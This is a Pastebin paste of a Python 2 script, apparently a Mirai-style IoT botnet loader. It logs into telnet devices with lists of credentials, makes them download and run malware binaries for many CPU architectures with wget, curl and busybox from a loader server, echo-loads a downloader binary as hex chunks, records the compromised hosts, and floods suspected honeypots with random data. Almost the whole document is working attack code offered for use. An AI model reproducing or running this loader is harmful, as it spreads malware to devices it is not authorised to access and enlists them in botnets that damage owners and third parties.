API tools faq
paste
KekSec

FREAKS TELNET ECHOLOADER - 250K VIEWS SPECIAL

KekSec
Feb 10th, 2021 (edited)
1,260
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 14.97 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #Phaaaat hax telnet loader by Freak/Milenko
  3. #this loader actively detects honeypots using incorrect user agents when requesting bins.
  4. #it will actively block any detected honeypot with iptables.
  5. #USAGE(S):
  6.  
  7. #ANTI HONEYPOT MODE:
  8. #cat list.txt | python loader.py 1 8081
  9.  
  10. #DUMBASS MODE
  11. #cat list.txt | python loader.py 0
  12.  
  13. #SELFREP MODE (recommended) configure capsaicin for scanlisten port
  14. #ncat -kvlp scanlistenport | python loader.py 1 8081
  15.  
  16. import sys, re, os, socket, time, select,sys
  17. from threading import Thread
  18. serverip = "1.3.3.7"
  19. binprefix = "/bins/keksec"
  20. binname = binprefix.split("/")[-1]
  21. rekdevice = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
  22. cd /tmp || cd $(find / -writable | head -n 1);
  23. wget http://""" + serverip + binprefix + """.mips -O keksec.mips; busybox wget http://""" + serverip + binprefix + """.mips -O keksec.mips; chmod 777 """ + binname + """.mips; ./""" + binname + """.mips; rm -f """ + binname + """.mips
  24. wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; busybox wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; chmod 777 """ + binname + """.mpsl; ./""" + binname + """.mpsl; rm -f """ + binname + """.mpsl
  25. wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; busybox wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; chmod 777 """ + binname + """.sh4; ./""" + binname + """.sh4; rm -f """ + binname + """.sh4
  26. wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; busybox wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; chmod 777 """ + binname + """.x86; ./""" + binname + """.x86; rm -f """ + binname + """.x86
  27. wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; busybox wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; chmod 777 """ + binname + """.arm7; ./""" + binname + """.arm7; rm -f """ + binname + """.arm7
  28. wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; busybox wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; chmod 777 """ + binname + """.x64; ./""" + binname + """.x64; rm -f """ + binname + """.x64
  29. wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; busybox wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; chmod 777 """ + binname + """.ppc; ./""" + binname + """.ppc; rm -f """ + binname + """.ppc
  30. wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; busybox wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; chmod 777 """ + binname + """.i586; ./""" + binname + """.i586; rm -f """ + binname + """.i586
  31. wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; busybox wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; chmod 777 """ + binname + """.m68k; ./""" + binname + """.m68k; rm -f """ + binname + """.m68k
  32. wget http://""" + serverip + binprefix + """.spc -O keksec.spc; busybox wget http://""" + serverip + binprefix + """.spc -O keksec.spc; chmod 777 """ + binname + """.spc; ./""" + binname + """.spc; rm -f """ + binname + """.spc
  33. wget http://""" + serverip + binprefix + """.arm -O keksec.arm; busybox wget http://""" + serverip + binprefix + """.arm -O keksec.arm; chmod 777 """ + binname + """.arm; ./""" + binname + """.arm; rm -f """ + binname + """.arm
  34. wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; busybox wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; chmod 777 """ + binname + """.arm5; ./""" + binname + """.arm5; rm -f """ + binname + """.arm5
  35. wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; busybox wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; chmod 777 """ + binname + """.ppc-440fp; ./""" + binname + """.ppc-440fp; rm -f """ + binname + """.ppc-440fp"""
  36. rekdevice = rekdevice.replace("\r", "").split("\n")
  37.  
  38. global fh
  39. fh = open("bots.txt","a+")
  40.  
  41. def chunkify(lst,n):
  42.     return [ lst[i::n] for i in xrange(n) ]
  43.  
  44. running = 0
  45.  
  46. global echo
  47. global tftp
  48. global wget
  49. global logins
  50. global echoed
  51. echoed = []
  52. tftp = 0
  53. wget = 0
  54. echo = 0
  55. logins = 0
  56. ran = 0
  57. def printStatus():
  58.     global echo
  59.     global tftp
  60.     global wget
  61.     global logins
  62.     global ran
  63.     while 1:
  64.         time.sleep(5)
  65.         print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + "     Ran:" + str(ran) + "  Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
  66.  
  67. def readUntil(tn, advances, timeout=8):
  68.     buf = ''
  69.     start_time = time.time()
  70.     while time.time() - start_time < timeout:
  71.         buf += tn.recv(1024)
  72.         time.sleep(0.1)
  73.         for advance in advances:
  74.             if advance in buf: return buf
  75.     return ""
  76.  
  77. def recvTimeout(sock, size, timeout=8):
  78.     sock.setblocking(0)
  79.     ready = select.select([sock], [], [], timeout)
  80.     if ready[0]:
  81.         data = sock.recv(size)
  82.         return data
  83.     return ""
  84.  
  85. def contains(data, array):
  86.     for test in array:
  87.         if test in data:
  88.             return True
  89.     return False
  90.  
  91. def split_bytes(s, n):
  92.     assert n >= 4
  93.     start = 0
  94.     lens = len(s)
  95.     while start < lens:
  96.         if lens - start <= n:
  97.             yield s[start:]
  98.             return # StopIteration
  99.         end = start + n
  100.         assert end > start
  101.         yield s[start:end]
  102.         start = end
  103.  
  104. global badips
  105. badips=[]
  106. def fileread():
  107.     fh=open("honeypots.txt", "rb")
  108.     data=fh.read()
  109.     fh.close()
  110.     return data
  111. def clientHandler(c, addr):
  112.     global badips
  113.     try:
  114.         if addr[0] not in badips and addr[0] not in fileread():
  115.             print addr[0] + ":" + str(addr[1]) + " has connected!"
  116.             request = recvTimeout(c, 8912)
  117.             if "curl" not in request and "Wget" not in request:
  118.                 if addr[0] not in fileread():
  119.                     fh=open("honeypots.txt", "a")
  120.                     fh.write(addr[0]+"\n")
  121.                     fh.close()
  122.                     os.popen("iptables -A INPUT -s " + addr[0] + " -j DROP")
  123.                 badips.append(addr[0])
  124.                 print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
  125.                 c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
  126.                 for i in range(10):
  127.                     c.send(os.urandom(65535*2))
  128.         else:
  129.             c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
  130.             for i in range(10):
  131.                 c.send(os.urandom(65535*2))
  132.         c.close()
  133.     except Exception as e:
  134.         #print str(e)
  135.         pass
  136.  
  137. def honeyserver(honeyport):
  138.     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  139.     s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  140.     s.bind(('', honeyport))
  141.     s.listen(999999999)
  142.     while 1:
  143.         try:
  144.             c, addr = s.accept()
  145.             Thread(target=clientHandler, args=(c, addr,)).start()
  146.         except:
  147.             pass
  148. if sys.argv[1]=="1":
  149.     Thread(target=honeyserver, args=(int(sys.argv[2]),)).start()
  150.  
  151. def infect(ip, username, password):
  152.     global badips
  153.     global echo
  154.     global tftp
  155.     global wget
  156.     global logins
  157.     global ran
  158.     global echoed
  159.     if ip in echoed:
  160.         return
  161.     infectedkey = "CAPSAICIN"
  162.     try:
  163.         tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  164.         tn.settimeout(1)
  165.         tn.connect((ip, 23))
  166.     except:
  167.         try:
  168.             tn.close()
  169.         except:
  170.             pass
  171.         return
  172.     try:
  173.         hoho = ''
  174.         hoho += readUntil(tn, ":")
  175.         if ":" in hoho:
  176.             tn.send(username + "\n")
  177.             time.sleep(0.1)
  178.         hoho = ''
  179.         hoho += readUntil(tn, ":")
  180.         if ":" in hoho:
  181.             tn.send(password + "\n")
  182.             time.sleep(0.8)
  183.         else:
  184.             pass
  185.         prompt = ''
  186.         prompt += recvTimeout(tn, 8192)
  187.         if ">" in prompt and "ONT" not in prompt:
  188.             success = True
  189.         elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
  190.             success = True
  191.         else:
  192.             tn.close()
  193.             return
  194.     except:
  195.         tn.close()
  196.         return
  197.     if success == True:
  198.         try:
  199.             tn.send("enable\r\n")
  200.             tn.send("system\r\n")
  201.             tn.send("shell\r\n")
  202.             tn.send("sh\r\n")
  203.             tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
  204.         except:
  205.             tn.close()
  206.             return
  207.         time.sleep(1)
  208.         try:
  209.             buf = recvTimeout(tn, 8192)
  210.         except:
  211.             tn.close()
  212.             return
  213.         if "AK47" in buf:
  214.             if sys.argv[1] == "1":
  215.                 tn.send("wget http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
  216.                 tn.send("curl http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
  217.                 time.sleep(3)
  218.                 recvTimeout(tn, 8192)
  219.                 if ip in badips:
  220.                     return
  221.             print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  222.             logins += 1
  223.             fh.write(ip + ":23 " + username + ":" + password + "\n")
  224.             fh.flush()
  225.             for rek in rekdevice:
  226.                 tn.send(rek + "\r\n")
  227.                 time.sleep(3)
  228.                 buf = recvTimeout(tn, 1024*1024)
  229.                 loaded = False
  230.                 if "bytes" in buf:
  231.                     print "\033[32m[\033[31m+\033[32m] \033[33mwget \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  232.                     tftp += 1
  233.                     loaded = True
  234.                 elif "saved" in buf:
  235.                     print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  236.                     wget += 1
  237.                     loaded = True
  238.                 if infectedkey in buf:
  239.                     ran += 1
  240.                     print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  241.                     f=open("infected.txt", "a")
  242.                     f.write(ip +":23 " + username + ":" + password + "\r\n")
  243.                     f.close()
  244.             #if loaded:
  245.             #    tn.close()
  246.             #    return
  247.             tn.send("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /\r\n")
  248.             tn.send("cat /proc/mounts;busybox cat /proc/mounts\r\n")
  249.             mounts = recvTimeout(tn, 1024*1024)
  250.             for line in mounts.split("\n"):
  251.                 try:
  252.                     path = line.split(" ")[1]
  253.                     if " rw" in line:
  254.                         tn.send("echo -e '%s' > %s/.keksec; cat %s/.keksec;busybox cat %s/.keksec; rm %s/.keksec;busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
  255.                         if "AK47" in recvTimeout(tn, 1024*1024):
  256.                             tn.send("cd %s\r\n" % path) #cd into the writeable directory
  257.                 except:
  258.                     continue
  259.             for binary in "dlr.arm dlr.arm7 dlr.mips dlr.x86 dlr.mpsl dlr.m68k dlr.sh4 dlr.ppc dlr.spc".split(" "):
  260.                 try:
  261.                     first = True
  262.                     count = 0
  263.                     hexdata = []
  264.                     for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
  265.                         hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
  266.                     parts = len(hexdata)
  267.                     for hexchunk in hexdata:
  268.                         seq = ">" if first else ">>"
  269.                         tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")#;busybox echo -ne '" + hexchunk + "' " + seq + "\r\n")
  270.                         first = False
  271.                         count += 1
  272.                         time.sleep(0.01)
  273.                     print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
  274.                     tn.send("chmod 777 updDl;busybox chmod 777 updDl\r\n")
  275.                     tn.send("./updDl\r\n")
  276.                     time.sleep(5)
  277.                     tn.send("rm -rf ./updDl\r\n")
  278.                     time.sleep(0.1)
  279.                     tn.send("./gsdfsdf424r24\r\n") #change this to dvrHelper if using mirai
  280.                     time.sleep(1)
  281.                     tn.send("rm -rf ./gsdfsdf424r24\r\n") #and this
  282.                     buf = recvTimeout(tn, 1024*1024)
  283.                     if "FIN" in buf:
  284.                         echo += 1
  285.                         print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
  286.                         tn.close()
  287.                         f=open("echoes.txt","a")
  288.                         f.write(ip +":23 " + username + ":" + password + "\r\n")
  289.                         f.close()
  290.                         echoed.append(ip)
  291.                     if infectedkey in buf:
  292.                         ran += 1
  293.                         f=open("infected.txt", "a")
  294.                         f.write(ip +":23 " + username + ":" + password + "\r\n")
  295.                         f.close()
  296.                         print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
  297.                         tn.close()
  298.                         return
  299.                 except Exception as e:
  300. #                        print str(e)
  301.                     return
  302.     else:
  303. #        tn.close()
  304.         return
  305.  
  306. def check(chunk, fh):
  307.     global running
  308.     running += 1
  309.     threadID = running
  310.     for login in chunk:
  311.         try:
  312.             port = 23
  313.             if ":23 " in login:
  314.                 login = login.replace(":23 ", ":")
  315.                 port = 23
  316.             if ":2323 " in login:
  317.                 login = login.replace(":2323 ", ":")
  318.                 port = 2323
  319.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  320.             s.settimeout(1)
  321.             try:
  322.                 socket.inet_aton(login.split(":")[0])
  323.                 ip = login.split(":")[0]
  324.                 username = login.split(":")[1]
  325.                 password = login.split(":")[2]
  326.             except:
  327.                  try:
  328.                     socket.inet_aton(login.split(":")[2])
  329.                     ip = login.split(":")[2]
  330.                     username = login.split(":")[0]
  331.                     password = login.split(":")[1]
  332.                  except:
  333.                      continue
  334.             s.connect((ip, port))
  335.             s.close()
  336.             infect(ip, username, password)
  337.         except:
  338.             pass
  339.     running -= 1
  340.  
  341. while 1:
  342.     if running >= 512:
  343.         time.sleep(0.3)
  344.     try:
  345.         Thread(target = check, args = ([raw_input()], fh,)).start()
  346.     except KeyboardInterrupt:
  347.         os.kill(os.getpid(), 9)
  348.     except Exception:
  349.         pass
  350.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!